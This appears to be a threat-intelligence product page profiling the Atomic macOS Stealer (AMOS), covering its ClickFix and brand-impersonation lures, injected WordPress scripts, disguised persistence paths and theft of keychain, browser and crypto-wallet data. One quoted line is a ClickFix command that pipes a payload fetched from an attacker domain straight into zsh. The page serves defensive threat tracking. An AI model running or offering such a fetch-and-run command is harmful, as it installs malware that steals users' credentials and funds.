Atomic macOS Stealer (AMOS) is a macOS-focused infostealer. The provided content states it has been distributed in social-engineering campaigns targeting macOS users, including a 2025 campaign impersonating Spectrum, a U.S. telecom provider, and broader ClickFix-style attacks that trick users into executing malicious commands. The malware has received a significant update that adds a built-in backdoor component, enabling easier interactive access to infected hosts. Based on the content, AMOS is associated with credential and information theft on macOS systems and is delivered through deceptive lures and brand impersonation rather than software exploitation. High-confidence indicators from the content include its targeting of macOS users, use in ClickFix-related delivery chains, impersonation of Spectrum in at least one campaign, and the addition of an interactive backdoor capability.
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
31 distinct techniques documented for this family, organized by ATT&CK tactic.
"several legitimate websites with injected script" were used for a campaign using the ClickFix social-engineering technique.
“t.js injected through vulnerable WordPress themes or plugins.”
If a target is using macOS, they are instructed to copy and paste the following command, execute it... curl -fsSL https://apple-googleapi[.]com/i | zsh ... Only this time they're presented with an encrypted PowerShell script to copy and paste instead.
“A base64 string decodes to a second command, which runs in bash. This command downloads the stager into /tmp and runs it in the background.”
"Fake bot protection page" and "ClickFix instructions from fake verification pop-up" were caused by the injected script.
The victim copied text from the malicious webpage and pasted it into a Terminal window on macOS, causing the initial command to execute.
“A base64 string decodes to a second command, which runs in bash.”
The malicious site claimed to offer a cracked “macOS toolkit,” while actually installing AMOS stealer. Persistent components were placed in hidden-looking directories such as "/Library/Application Support/.com.apple.accountsd/" and named "AccountsHelper" and "mdworker_shared."
“Usually, the script tag has an id attribute (ganalytics-tracker-js) that imitates a Google Analytics tag”; the payload installs under “~/Library/Caches/com.apple.metadata/com.apple.verified.”
The malware targets cryptocurrency wallets, and the collected archive included "deskwallets/Binance/" and "deskwallets/TonKeeper/" directories; C2 traffic included "stage=wallets."
Upon execution, the malicious file targets browser passwords and cookies, various cryptocurrency wallets, keychain data, and Telegram files.
“The final payload is a variant of Atomic macOS Stealer (AMOS), targeting… macOS Keychain contents.”
216 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
2 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Atomic macOS Stealer (AMOS) is an infostealer targeting macOS systems, distributed via ClickFix-style lures, capable of stealing credentials and sensitive data from Apple devices.
Atomic macOS Stealer (AMOS) is a macOS stealer malware that now includes a backdoor for interactive access to infected systems.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.